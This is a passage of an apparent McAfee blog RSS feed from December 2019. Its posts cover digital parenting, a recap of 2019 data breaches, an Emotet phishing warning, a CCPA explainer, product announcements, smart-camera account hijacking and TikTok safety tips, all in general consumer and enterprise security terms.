The parent-child relationship is #1. When it comes to raising savvy digital kids and keeping them safe, there’s not a monitoring plan in existence that rivals a strong parent-child relationship. If you’ve earned your child’s heart, mind, and respect, you have his or her attention and can equip them daily to make wise choices online.

The dark web is . . . unimaginably dark. The underbelly of the internet — the encrypted, anonymous terrain known as the Dark Web — has moved from covert to mainstream exposure. We’ve learned the hard way the degree of sophistication with which criminals engage in pornography, human trafficking, drug and weapon sales, and stolen data. With more knowledge, the public is taking more precautions especially when it comes to malware, phishing scams, and virus attacks launched through popular public channels.

There’s a lot of good going on. As much negative as we’ve seen and experienced online over the past decade, we’ve also learned that its power can be used equally to amplify the best of humanity. Social media has sparked social movements, helped first responders and brought strangers together in times of tragedy like no other medium in history.

Privacy is (finally) king. Ten years ago, we clicked on every link that came our way and wanted to share every juicy detail about our personal lives. We became publishers and public figures overnight and readily gave away priceless chunks of our privacy. The evolution and onslaught of data breaches, data mining, and malicious scams have educated us to safeguard our data and privacy like gold.

We’ve become content curators. The onslaught of fake news, photo apps, and filter bubbles have left our heads spinning and our allegiances confused. In the process, we’ve learned to be more discerning with the content we consume and share. While we’re not there yet, our collective digital literacy is improving as our understanding of various types of content grows.

Parents have become digital ninjas. The parenting tasks of monitoring, tracking, and keeping up with kids online have gone from daunting to doable for most parents. With the emotional issues now connected to social media, most parents don’t have the option of sitting on the sidelines and have learned to track their kids better than the FBI.

This is us

We’ve learned that for better or worse, this wired life is us. There’s no going back. Where once there may have been doubt a decade ago, today it’s clear we’re connected forever. The internet has become so deep-seated in our culture and homes that unplugging completely for most of us is no longer an option without severe financial (and emotional) consequences. The task ahead for this new decade? To continue working together to diminish the ugly side of technology — the bullying, the cruelty, the crime — and make the internet a safe, fun experience for everyone.

The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/lessons-learned-a-decade-of-digital-parenting/feed/ 0
How to Apply the Lessons of 2019 to the Security of 2020 https://www.mcafee.com/blogs/enterprise/endpoint-security/how-to-apply-the-lessons-of-2019-to-the-security-of-2020/ https://www.mcafee.com/blogs/enterprise/endpoint-security/how-to-apply-the-lessons-of-2019-to-the-security-of-2020/#respond Mon, 23 Dec 2019 16:00:22 +0000 /blogs/?p=97865

What keeps executives up at night? According to the World Economic Forum’s (WEF) 2019 Executive Opinion Survey, it’s cyberattacks. When reflecting on 2019, it’s clear why that is. From healthcare and insurance to manufacturing and telecommunications, cybercriminals spared no industry from their schemes, with a few key verticals bearing the brunt of this year’s attacks. […]

The post How to Apply the Lessons of 2019 to the Security of 2020 appeared first on McAfee Blogs.

]]>

What keeps executives up at night? According to the World Economic Forum’s (WEF) 2019 Executive Opinion Survey, it’s cyberattacks. When reflecting on 2019, it’s clear why that is. From healthcare and insurance to manufacturing and telecommunications, cybercriminals spared no industry from their schemes, with a few key verticals bearing the brunt of this year’s attacks. It comes as no surprise that financial services, insurance, and healthcare were popular targets, given their proximity to sensitive, easily-monetizable data. A little more surprising, however, is the similarities between breaches across industries and organizations. Below, I’ll recap notable incidents from 2019, expand upon their commonalities, and explore a few lessons to learn as we enter a new year.

Different Industries, Same Causes

Although cybersecurity incidents rarely stem from one failure entirely, a few central causes and trends appeared throughout 2019.

Application Misconfiguration

Application misconfigurations were responsible for two of 2019’s most prominent data breaches. In the largest hack of the year, a former AWS employee exploited a misconfigured Web Application Firewall (WAF) to steal the Social Security numbers, bank account numbers, and other sensitive information of more than 100 million Capital One customers and credit card applicants. Initially labeled an insider attack due to Capital One hosting their data on Amazon servers, the breach was instead the result of the WAF receiving too many permissions, which enabled the malicious actor to access a back-end resource responsible for handing out access credentials. Although the information stolen was most likely neither shared nor used fraudulently, Capital One estimates the incident will cost the company over $300 million.

First American Financial Corporation fell prey to an even simpler misconfiguration in what was less a hack than outright negligence. A mistake in the company’s online customer portal enabled anyone with the URL of a valid First American document to modify a number in the existing URL to view other sensitive documents. A staggering 885 million customer financial records going back to 2003 were accessible because of this design defect. And while there is no evidence anyone actually found or stole the information, First American now faces both government investigations and a class-action lawsuit.

Exploiting Third-Party Access

Organizations must, of course, pay close attention to their own cybersecurity preparation, but in today’s hyperconnected digital world, they must also holistically audit the third parties they interact with as well. In 2019, both Quest Diagnostics and Sprint failed to conduct this due diligence. Quest, which is among the world’s largest clinical laboratories, exposed the personal information, including credit card numbers and Social Security numbers, of more than 11.9 million patients via a breach that originated from AMCA, an outside billing collections agency. To make matter’s worse, AMCA didn’t detect the vulnerability for almost a full year, allowing the attacker to slowly drain information from AMCA affiliates and ultimately forcing AMCA’s parent company into bankruptcy. Though Quest escaped such a dramatic fate, it is the subject of both government investigation and a class-action lawsuit.

Sprint faced a similar scenario this year when hackers accessed customer data through a vulnerability in a Samsung website. Samsung and Sprint are connected digitally to enable customers to finance Samsung phones through a carrier deal with Sprint, an arrangement that benefits their customers but also creates another threat vector to defend against. And though the exact name of Samsung’s vulnerability is unclear, this incident is further evidence of the need to protect oneself by choosing partners carefully.

Lack of Appropriate Authentication/Credentials for Sensitive Data

This third trend could apply to nearly every breach in this post, but it’s the central cause of at least two significant 2019 cybersecurity incidents. In August of this year, State Farm was hit with a credential stuffing attack in which attackers leveraged usernames and passwords from other data breaches to log in to other accounts and sites. Because people often use the same passwords for multiple accounts, credential stuffing is an effective tactic and one used in a second hacking of Sprint through its Boost Mobile subsidiary. In that case, an unauthorized person used Boost numbers and PIN codes to break into an unknown number of customer accounts.

Key Actions to Take in 2020 

If cybersecurity is to improve in 2020, these mistakes must be prevented and vulnerabilities like the ones mentioned above must be addressed. That starts with companies having a better understanding of the access controls, technologies, and systems that are currently deployed. With that understanding, they can plug gaps and utilize the technology most appropriate to their situation, helping them to avoid a situation like First American’s, in which data was readily available online without restriction. For many, especially those interfacing with outside vendors, a zero trust model makes sense because it continuously monitors and authenticates access requests. Under zero trust, for example, the Quest Diagnostics hack would have likely been detected within days, not months.

Even without zero trust, however, continuous and automated monitoring is critical. With that in place, security teams are alerted of attacks such as credential stuffing as they occur and can respond before the attacker is successful. For a more proactive approach, IT security should also implement policies that, for example, prevent one person or IP from submitting multiple login requests or require re-authentication to access different applications.

In addition to auditing themselves and taking the actions described above, organizations must also audit the security controls of their partners to ensure they deploy layers of control and multi-protocol defenses. This means that they have overlapping layers of defense—for example, continuous monitoring and multi-factor authentication—that create redundancy and depth across their environment.

Ultimately, the goal is to act immediately upon security alerts—no matter where they stem from—in order to contain and remediate threats in a timely manner. That means visibility and integration are critical to avoid delays from validating alerts and pivoting between disparate tools. When McAfee MVISION EDR, for example, finds a threat using its artificial intelligence-driven detection capabilities, it immediately elevates an alert to all systems and individuals involved, not just McAfee-built technology. Similarly, MVISION Cloud leverages machine learning to identify suspicious behavior and access requests. This type of automated detection, investigation, and notification could easily be the difference between an isolated breach remediated in hours and a system-wide catastrophe spread over several weeks or months.

For more information on effective endpoint security strategies, follow us at @McAfee and @McAfee_Business and visit our blog for the most relevant information and trends.

 

The post How to Apply the Lessons of 2019 to the Security of 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/how-to-apply-the-lessons-of-2019-to-the-security-of-2020/feed/ 0
10 Thoughtful (Free) Holiday Gifts to Give Your Digital Friends Year ‘Round https://www.mcafee.com/blogs/consumer/family-safety/10-thoughtful-free-gifts-to-give-your-friends-online-year-round/ https://www.mcafee.com/blogs/consumer/family-safety/10-thoughtful-free-gifts-to-give-your-friends-online-year-round/#comments Sat, 21 Dec 2019 15:00:24 +0000 /blogs/?p=97827 chat etiquette

Just a quick poll. What feelings do these digital scenarios evoke: being ghosted, getting trapped in a group text, being left on ‘read,’ or someone blowing up your phone with a million messages? Did you cringe a little or drop your phone like a hot potato? You wouldn’t be alone. A lot of people (this […]

The post 10 Thoughtful (Free) Holiday Gifts to Give Your Digital Friends Year ‘Round appeared first on McAfee Blogs.

]]>
chat etiquette

Just a quick poll. What feelings do these digital scenarios evoke: being ghosted, getting trapped in a group text, being left on ‘read,’ or someone blowing up your phone with a million messages?

Did you cringe a little or drop your phone like a hot potato? You wouldn’t be alone. A lot of people (this writer included) make these communication faux pas every day without even realizing it.

But making this season a little more merry and bright, Facebook Messenger recently teamed up with Debrett’s, the authority on modern etiquette, to develop the first formal guide on the etiquette of digital messaging. Based on consumer research, the guide applies to chatting with friends, family, co-workers, or love interests.

So, to stay off everyone’s naughty list this year, take a minute to review timeless ways to be more courteous and considerate when texting, emailing or messaging. We’ve paraphrased the guide

but recommend you download the full guide here.

10 messaging étiquette tips

  1. Hone your tone. Keep the tone of your messages upbeat and neutral – avoid using sarcasm or irony unless you are confident the other person will get the joke. Include a positive symbol or affectionate emoji to make it clear the joke is well-intended.
  2. Keep it concise… but not too concise. Stick to a few sentences. Long paragraphs of text are overwhelming and put the burden on the other person to respond in kind. On the other hand, consistently sending one-word messages or a single emoji looks curt and implies that you’re too busy or uninterested.
  3. Don’t multi-message. Don’t send four or five messages (blow up someone’s phone) if one will do. Multiple notifications can be distracting. Likewise, in a group chat, sending several messages at a time can appear domineering and be confusing others on the chat.
  4. Share with care. Don’t forward a message unless the original sender has given permission. If in doubt, ask first. Equally, refrain from broadcasting other people’s private information on a group chat.
  5. Know your audience. Invited to a group chat? Be sure to check who else is involved before sending a message. Failing to familiarize yourself with who is in the chat could be trouble. Start a separate message exchange if you need to make individual arrangements – spare the group the additional details and alerts.
  6. Don’t leave them hanging. If a member of your group chat has sent a message without receiving a reply, alleviate their awkwardness with a response – even if only to ‘like’ their message or say that you don’t know the answer.
  7. Abide by the quick reply. As a recipient, it’s polite to reply promptly to messages. Busy? If it’s not urgent, leave it unread until you can respond. Alternatively, turn on push notifications so you can preview the message without letting the other person know it has been seen. As the sender, unless a message is urgent, wait at least a day before nudging someone for a reply.
  8. Give up ghosting. If you’ve lost interest in a conversation, don’t abruptly cut off all contact — or ghost — someone. Ignoring someone’s messages leads to anxiety and uncertainty for the sender. If you want to end an interaction, do so openly but gently, with a brief, polite explanation. If you have been dating or have known someone a while, give them a call or let them know in person.
  9. Practice good exit-quette. Too many food photos and wedding prep updates on your group text? Don’t just drop off. Offer a brief explanation, keeping as close to the truth as possible: ‘Hi guys, I’m on deadline and need a break from my phone to get some work done!’ Another option is to mute the conversation.
  10. Sign off in style. Don’t underestimate the value of closing out a conversation. If you’re switching gears to another activity, it’s best to let the other person know, even if it’s a simple, “be right back.”

A final, personal note on digital etiquette. Billions of people congregate online every day. Billions. A lot of beautiful words, ideas, and connections transpire every minute alongside missteps and hurtful offenses. That said, it’s Christmas. If you’ve been on the sending or receiving side of a digital fallout over the years, consider extending some grace. Reconnect. Apologize. Forgive. No one’s getting it right all the time online, but we’re all getting better, and that’s something to celebrate.

The post 10 Thoughtful (Free) Holiday Gifts to Give Your Digital Friends Year ‘Round appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/10-thoughtful-free-gifts-to-give-your-friends-online-year-round/feed/ 1
Don’t RSVP to This Holiday Party: Protect Yourself From the Emotet Trojan https://www.mcafee.com/blogs/consumer/consumer-threat-notices/christmas-emotet-trojan/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/christmas-emotet-trojan/#respond Fri, 20 Dec 2019 17:45:14 +0000 /blogs/?p=97852

The holiday season is officially among us. From last-minute holiday shopping to attending countless parties, this time of year keeps users busy. The holiday season is an especially busy time for cybercriminals as well. According to Bleeping Computer, the cybercriminals behind the Emotet trojan have been targeting users with a new spam campaign that impersonates […]

The post Don’t RSVP to This Holiday Party: Protect Yourself From the Emotet Trojan appeared first on McAfee Blogs.

]]>

The holiday season is officially among us. From last-minute holiday shopping to attending countless parties, this time of year keeps users busy. The holiday season is an especially busy time for cybercriminals as well. According to Bleeping Computer, the cybercriminals behind the Emotet trojan have been targeting users with a new spam campaign that impersonates a Christmas party invitation.

How exactly have malicious actors been trying to put a damper on the holiday fun? They’ve crafted phony invites that include a subject line like “Christmas party next week.” Additionally, the invitation asks users to wear their ugliest Christmas sweaters and view an attached party menu. To further disguise this threat, the cybercriminals behind the attack have titled the attached documents “Christmas party.doc” or “Party menu.doc.” If a user opens one of these stealthy Word documents, they are prompted to ‘Enable Editing’ or ‘Enable Content’ to view it. However, if a user enables the content, the Emotet trojan will consequentially be installed. Once this is done, the victim’s device can be used for more malicious attacks such as sending further spam emails, downloading the TrickBot banking trojan to steal user data, and even a ransomware stocking stuffer.

So, what can users do to avoid this unwanted grinch from stealing their Christmas? Check out these tips to protect your security:

  • Click with caution. Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile app to check emails on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t RSVP to This Holiday Party: Protect Yourself From the Emotet Trojan appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/christmas-emotet-trojan/feed/ 0
New Version of App Control Revving Up https://www.mcafee.com/blogs/other-blogs/executive-perspectives/new-version-of-app-control-revving-up/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/new-version-of-app-control-revving-up/#respond Fri, 20 Dec 2019 16:00:02 +0000 /blogs/?p=97841

As a leader in the Department of Homeland Security’s (DHS) Continuous Diagnostics and Mitigation (CDM) program, McAfee is constantly innovating to meet and exceed the security needs of the federal government. Federal agencies count on McAfee to secure their networks and systems, from device to the cloud, and we’re always anticipating and preparing today for […]

The post New Version of App Control Revving Up appeared first on McAfee Blogs.

]]>

As a leader in the Department of Homeland Security’s (DHS) Continuous Diagnostics and Mitigation (CDM) program, McAfee is constantly innovating to meet and exceed the security needs of the federal government. Federal agencies count on McAfee to secure their networks and systems, from device to the cloud, and we’re always anticipating and preparing today for tomorrow’s needs.

That’s why McAfee is launching an updated version of Application Control.  Application Control is a critical component of the CDM program that fulfills two core functions as defined in the Software Asset Management (SWAM) capability requirements: Application Whitelisting and the timely delivery of an agency’s complete software inventory.

Application Control is an endpoint technology that prevents attacks by blocking the execution of unauthorized applications. The whitelisting program will scan the system for executables, applications, libraries, drivers, and scripts to classify them as well-known, unknown, or known-bad applications. Using whitelisting prevents attacks from unknown malware by allowing only known-good whitelisted applications to run.

The latest iteration of McAfee’s Application Control includes enhanced features and functionality for the centrally managed Software Inventory Mode, Common Platform Enumeration (CPE) Reporting, and Local User support, while also maintaining the basic proactive security functions that provide a safe environment from unknown and future threats.

The primary function of the new Inventory Mode in Application Control is to provide visibility of an enterprise’s installed software in a monitoring-only capacity. Once enabled, the endpoint will continuously update the centrally managed software inventory for an endpoint, thereby ensuring accurate information is available for ingestion into the CDM dashboard. In Inventory mode, an initial solidification process is needed to create the inventory and then is sent to the McAfee ePO server. Following solidification, subsequent differential updates are sent to the ePO server, providing consistent and timely updates to the centrally managed inventory.

Another new feature of Application Control is the introduction of Common Platform Enumeration (CPE) reporting. CPE is a standardized method of describing and identifying classes of applications, operating systems, and hardware devices present among an enterprise’s computing assets. There are three dictionary types of CPE: official dictionary, custom dictionary, and managed custom dictionary, which all provide support for applications in custom environments. This feature will serve as a repeatable and accurate method for identifying software installed on an agency’s physical and virtual assets.

The final upgrade to Application Control is Local User Support. This capability will greatly reduce the administrative overhead for on-site administrators by granting the ability to make changes to local endpoints by streamlining operations on a protected system. For example, administrators can be added as a trusted user to allow him or her to install or update any software.

As a champion of the CDM program, McAfee understands the importance of continuously modernizing our solutions, staying ahead of the changing threat landscape and evolving needs of our agency partners.  Incorporating the new version of Application Control with the rest of our product suite is an important step that agencies can take to holistically secure their enterprise network while simultaneously achieving the goals of the CDM program. We are excited about the new features in Application Control and the benefits participating CDM agencies can achieve with McAfee.

 

The post New Version of App Control Revving Up appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/new-version-of-app-control-revving-up/feed/ 0
Here’s How the California Consumer Privacy Act Will Affect You https://www.mcafee.com/blogs/consumer/california-consumer-privacy-act-2020/ https://www.mcafee.com/blogs/consumer/california-consumer-privacy-act-2020/#comments Thu, 19 Dec 2019 17:41:38 +0000 /blogs/?p=97820

On May 25, 2018, the European Union implemented a new privacy legislature called the General Data Protection Regulation or GDPR. This regulation updated European law to give EU citizens more control over their data as a result of the hyper-connected world we live in today. Then last June, California responded with its own bill called […]

The post Here’s How the California Consumer Privacy Act Will Affect You appeared first on McAfee Blogs.

]]>

On May 25, 2018, the European Union implemented a new privacy legislature called the General Data Protection Regulation or GDPR. This regulation updated European law to give EU citizens more control over their data as a result of the hyper-connected world we live in today. Then last June, California responded with its own bill called the California Consumer Privacy Act (CCPA). This bill, which goes into effect January 2020, broadens the scope of privacy rights for Californians, including data access rights and a limited private right of action. Essentially, the CCPA gives users the right to know just how companies are making money off of their data.

What are users’ new rights under the CCPA? First, businesses are required to reveal the personal data that is collected, sold, or disclosed for their business purposes. This includes informing users what categories of data were collected and how their data will be used. Second, companies are unable to discriminate against a consumer who exercises their rights under the CCPA. Third, businesses must provide users access to their data. Fourth, companies are required to delete users’ data upon request (with some significant exceptions). This includes personal data that the company might have shared with a third party. Lastly, businesses must provide the user with the ability to opt-out of the sale of their data.

That all sounds beneficial for privacy-conscious consumers, but how exactly does the CCPA define personal information? The CCPA defines personal information as any information that identifies, relates to, describes, is capable of being associated with, or could be reasonably linked with a particular consumer or household. Some examples of this type of data include a real name, user name, email address, Social Security Number, passport number, property records, biometric data, and internet activity like browsing history or IP addresses.

So, how will the CCPA be rolled out and what happens if a business violates the CCPA? Parts of this regulation will go into effect on January 1, 2020, but most will be enforced starting on July 1, 2020. According to the California legislature, if a business violates the CCPA and fails to fix the violations within 30 days, they are liable for a civil penalty. A company may be charged a maximum penalty of $2,500 per violation, or $7,500 per each intentional violation of the law that is not fixed within 30 days. If a company suffers a data breach resulting in the theft of personal information, they may be ordered to pay damages to the impacted California residents.

While California is the first large state to implement these privacy regulations in the U.S., it certainly won’t be the last. Other states have begun drafting similar bills and similar regulations will likely come into effect over the next few years; Congress also has some significant bills under consideration. As this legislation is rolled out, consumers need to be aware of their new rights to help them better protect their privacy.

Stay on top of the latest consumer and security news by following @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Here’s How the California Consumer Privacy Act Will Affect You appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/california-consumer-privacy-act-2020/feed/ 2
2019 Recap: A Year to Remember https://www.mcafee.com/blogs/enterprise/2019-recap-a-year-to-remember/ https://www.mcafee.com/blogs/enterprise/2019-recap-a-year-to-remember/#comments Wed, 18 Dec 2019 16:00:50 +0000 /blogs/?p=97814

Working Even Harder To End the Cybersecurity Talent Shortage The term “skills gap” is all too familiar to those in the cybersecurity industry. A recent ISACA survey found only 18% of respondents said they believed the cybersecurity skills gap will be mostly or entirely filled during the upcoming decade, while 81% said companies aren’t investing […]

The post 2019 Recap: A Year to Remember appeared first on McAfee Blogs.

]]>

Working Even Harder To End the Cybersecurity Talent Shortage

The term “skills gap” is all too familiar to those in the cybersecurity industry. A recent ISACA survey found only 18% of respondents said they believed the cybersecurity skills gap will be mostly or entirely filled during the upcoming decade, while 81% said companies aren’t investing enough in the people skills needed to navigate technological change. The talent shortage, coupled with the increasing volume of threats and the changing cybercrime landscape, presents a problem which is only getting worse. One initiative that McAfee is investing heavily in is education, and in September of this year, we expanded our work as a founding partner of the new Master of Cybersecurity and Threat Intelligence at the University of Guelph.

A Strong Presence at RSA

During this year’s RSA conference, VP and Chief Technology Officer Steve Grobman and Chief Data Scientist Dr. Celeste Fralick took the main stage to discuss how the industry needs to think about artificial intelligence, its power, and the possible ways it can be used against us. Despite its tremendous potential, Fralick explained, “Most people don’t realize how fragile AI and machine learning can really be.” In closing, Grobman told RSA attendees, “We must embrace AI but never ignore its limitations. It’s just math. It’s fragile. And there is a cost to both false positives and false negatives.”

Uncovering Ransomware Resurgence

As detailed in our August Threat Report, our Advanced Threat Research discovered that new ransomware samples had increased 118% from Q1 to Q2. The most active ransomware families of the quarter appeared to be Dharma (also known as Crysis), GandCrab and Ryuk. Other notable ransomware families of the quarter include Anatova, which was exposed by our ATR team before it had the opportunity to spread broadly, and Scarab, a persistent and prevalent ransomware family with regularly discovered new variants.

We’ve also seen an increase in the number of victims that have given in to the extortion demands of attackers, often paying ransom demands of hundreds or thousands of dollars in order to restore their systems.

The Release of The Cybersecurity Playbook

In September, McAfee Chief Marketing Officer Allison Cerra released her latest book, The Cybersecurity Playbook, which draws from her experiences as CMO and incorporates straightforward assessments, adaptable action plans, and many current examples to provide practical recommendations for cybersecurity policies. The Cybersecurity Playbook is an invaluable guide to identifying security gaps, getting buy-in from the top, promoting effective daily security routines, and safeguarding vital resources. Strong cybersecurity is no longer the sole responsibility of IT departments, but that of every executive, manager, and employee—so Cerra’s book provides practical to-dos for those at every level.

ATR Findings Announced at Black Hat and DEFCON

At Black Hat and DEFCON, we announced the discovery of two major vulnerabilities in commonly deployed industrial and enterprise devices. The first is a zero-day vulnerability in a Delta building controller that would allow malicious actors to manipulate access control systems, boiler rooms, temperature control for critical systems and more. The second vulnerability we announced was a 10-year-old bug within an innocuous Avaya desk phone. These findings prove that backdoors for bad actors to enter sensitive industrial and corporate environments are both wide-ranging and easy to miss. As more and more devices are connected to the internet, businesses, manufacturers and end users must be increasingly vigilant.

12th Annual MPOWER Cybersecurity Summit

This year, we hosted MPOWER at the Aria in Las Vegas, where fellow security experts strategized, networked, and discovered the newest and most innovative ways to ward off advanced cyberattacks. In addition to the announcement of several new innovations, MPOWER also featured a number of key speakers, including Madeleine Albright, Colin Powel, and McAfee CEO Chris Young, who stressed the importance of time. Missed this year’s event? Take a look at our top 5 highlights.

Announcing MVISION Insights

Live from the MPOWER main stage, we announced MVISION Insights, which will help organizations move to an action-oriented, proactive security posture by pinpointing threats that matter, offering insights into the effectiveness of their defenses, and providing the ability to respond quickly and accurately to these threats. Security teams will soon be able to utilize the data gathered by McAfee from more than one billion sensors worldwide and correlate it with their own threat data. This will allow them to obtain the information needed to battle threats targeting their systems and data, while also preemptively preparing defenses against threats even before they are seen in their environments.

First Cybersecurity Company to Achieve Global Gender Pay Parity

In April, we announced that we had become the first cybersecurity company to achieve global gender pay parity. “By achieving gender pay parity at McAfee, we continue to live our values, build an inclusive culture, create better workplaces, and develop stronger communities. I’m honored to join companies beyond the world of cyber already striving towards pay parity, and I hope more will join us in reaching this milestone in equality,” said Chief Human Resources Officer Chatelle Lynch. Reinforcing our company’s commitment to building an inclusive workplace, we also released our first Inclusion and Diversity Report, highlighting our strategy and results to support and increase its diverse workforce.

Introducing Unified Cloud Edge

Also at MPOWER, we introduced Unified Cloud Edge, an industry first initiative to address the security concerns of the cloud. By converging the capabilities of our award-winning MVISION Cloud, McAfee Web Gateway, and McAfee Data Loss Prevention offerings—all to be available through the MVISION ePolicy Orchestrator (ePO) platform—McAfee Unified Cloud Edge will enable a borderless IT environment. “The convergence of security solutions that traditionally have functioned independently will improve an organization’s security posture by creating security defenses that work cohesively to defend against attacks,” Rob Westervelt, research director at IDC, said. “But even more importantly, this convergence will help ease the burden of managing security and compliance across hybrid and multi-cloud environments, which is one of the most significant challenges enterprises face today.”

Threat Predictions for the Year Ahead

It’s been yet another eventful year for cyberattacks. Although there is still some time left for 2019, it’s time to look towards the new year and speculate what may be in store for the threatscape. Here are the top five threat predictions for 2020.

  1. Broader Deepfakes Capabilities for Less-Skilled Threat Actors
  2. Adversaries to Generate Deepfakes to Bypass Facial Recognition
  3. Ransomware Attacks to Morph into Two-Stage Extortion Campaigns
  4. Application Programming Interfaces (API) Will be Exposed as the Weakest Link Leading to Cloud-Native Threats
  5. DevSecOps Will Rise to Prominence as Growth in Containerized Workloads Causes Security Controls to ‘Shift Left’

For more details on our 2020 Threat Predictions, click here.

The post 2019 Recap: A Year to Remember appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/2019-recap-a-year-to-remember/feed/ 1
Cybercriminal Speaks With Child via Hacked Smart Camera: How You Can Stay Protected https://www.mcafee.com/blogs/consumer/consumer-threat-notices/hacked-smart-camera-how-you-can-stay-protected/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/hacked-smart-camera-how-you-can-stay-protected/#comments Tue, 17 Dec 2019 00:15:11 +0000 /blogs/?p=97810

IoT devices enter our homes out of ease and convenience, as the gadgets often optimize or streamline ordinary tasks — such as notifying us who’s at the front door or providing us home surveillance at the touch of a button. And though these devices are helpful, they also provide cybercriminals with a way to enter […]

The post Cybercriminal Speaks With Child via Hacked Smart Camera: How You Can Stay Protected appeared first on McAfee Blogs.

]]>

IoT devices enter our homes out of ease and convenience, as the gadgets often optimize or streamline ordinary tasks — such as notifying us who’s at the front door or providing us home surveillance at the touch of a button. And though these devices are helpful, they also provide cybercriminals with a way to enter homes if the gadgets are left unprotected. As a matter of fact, it was reported just last week that a camera from Ring, a smart home security system, was hacked by a cybercriminal – who was able to speak directly to a child in her bedroom as a result.

So, what exactly happened? According to The Washington Post, a cybercriminal was able to get inside a family’s Ring system, specifically taking over the camera in the children’s bedroom. The crook then interacted with one of the family’s daughters via the camera’s two-way talk function, harassing her with taunts and negative statements.

Reports have stated that this attack is in no way related to a breach or compromise of Ring’s security, but rather a case of reused credentials or access to online account logins, usernames, etc. Unfortunately, this is a common phenomenon within the realm of cybersecurity – as credentials are commonly for sale or available online due to large-scale breaches or are often easily guessed by cybercriminals given users’ bad habit of reusing existing logins.

Now, this incident isn’t just isolated to Ring cameras, as it has been observed with some baby monitor manufacturers and is a growing trend. So, the next question is – what can users do to prevent themselves from experiencing a similar attack on their IoT devices? They can start by following these tips:

  • Change your passwords. You should mix up your passwords as frequently as every two months. Additionally, you can use an online password management tool that creates very complex passwords that are hard to crack and you won’t have to remember on your own.
  • Don’t share your account logins to give others access. Be stringent when it comes to sharing logins. While it can be tempting to share passwords to streaming services and social media, your personal login should remain personal.
  • Use the “two-factor” option on your connected device. Implementing two-factor authentication can help halt a cybercriminal in their tracks. That’s because two-factor authentication adds an extra layer of protection to a device, since it requires access to a mobile phone in addition to a user’s login information.
  • Keep your camera’s firmware up to date.Vulnerabilities in software do happen and having the latest firmware version will help reduce the risk of being compromised.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminal Speaks With Child via Hacked Smart Camera: How You Can Stay Protected appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/hacked-smart-camera-how-you-can-stay-protected/feed/ 4
Parents: You May Want to Pay Closer Attention to the TikTok App https://www.mcafee.com/blogs/consumer/family-safety/parents-you-may-want-to-pay-closer-attention-to-the-tiktok-app/ https://www.mcafee.com/blogs/consumer/family-safety/parents-you-may-want-to-pay-closer-attention-to-the-tiktok-app/#respond Sat, 14 Dec 2019 15:00:25 +0000 /blogs/?p=97792 TikTok risky app

You aren’t imagining things. Everyone is talking about the popular video-sharing app TikTok. That’s because it has simultaneously become both a source of entertainment for kids as well as a source of concern for some adults. The social network, owned by Chinese parent company ByteDance, recently reached 750 million downloads, pushing its popularity ahead of […]

The post Parents: You May Want to Pay Closer Attention to the TikTok App appeared first on McAfee Blogs.

]]>
TikTok risky app

You aren’t imagining things. Everyone is talking about the popular video-sharing app TikTok. That’s because it has simultaneously become both a source of entertainment for kids as well as a source of concern for some adults.

The social network, owned by Chinese parent company ByteDance, recently reached 750 million downloads, pushing its popularity ahead of Facebook, Instagram, YouTube, and Snapchat.

But while kids are busy creating and consuming short TikTok videos, a concerned community of parents, app users, and lawmakers are taking the app to the mat with allegations of censorship, misuse of data, and unlawful foreign influence. Just this week TikTok moderators admitted to limiting the content reach of users with disabilities deeming them “highly vulnerable to cyberbullying,” a policy approach that sorely misfired.

Next steps

Download TikTok. Simply hoping your child is behaving and steering clear of online danger zones, is not an effective safety strategy. At times it’s best to roll up your sleeves and get in the game. You don’t need to create a profile to browse public TikTok accounts and get a feel for the app’s content and various audiences. The interface is similar to Instagram so using the search bar to type in a hashtag or tapping the familiar “discover” button will expose you to a variety of content. You can also browse trending TikTok videos from your laptop, here.

tiktok risky apps

Understand how your child uses TikTok. You can do this by creating a TikTok account and following your child’s account or by hanging out and watching your child create content, comment on videos, or interact with friends. You can even join in and make a video together. Depending on the age of your child and your rapport, this is the moment you may get accused of being creepy, hovering, or stalking. Don’t sweat it. Ignore the sighs, huffs, and protests. Understanding your child’s digital habits and app use is part of being a parent today — so press on!

Get real about the risks. Don’t allow the fun, creative, and entertaining elements of the app (it is definitely an endless well of funny, clever content) overshadow the potential dangers such as cyberbullying, inappropriate content, explicit lyrics, potential predators, and possible privacy issues.

Read the reviews. The app reviews on Google Play or the Apple Store can be biased. A better source for objective reviews from both kids and parents can be found at Common Sense Media. Reading reviews can save you time (and heartache) by shedding light on lesser-known risks you need to discuss as a family.

5 TikTok safety basics

If you’ve weighed the pros and cons and decide your child can safely maintain an active TikTok account, here are some safety basics to consider:

  1. Require your child to keep his or her TikTok account private (monitor to make sure it stays private). Change the settings for comments, duets, reactions, and messages to “friends” instead of “everyone.”
  2. Monitor Direct Messages and Comments since these are the most common ways strangers initiate contact with minors.
  3. Discuss how to respond to potential cyberbullying, inappropriate comments, or strangers who attempt to connect. Be sure your child knows where to report issues.
  4. Adhere to age restrictions. Point younger users to the “under 13” section of the app that restricts access to mature content.
  5. Use TikTok’s new Family Safety mode, which allows a parent to link their TikTok account to their child’s so they can easily monitor content and connections.

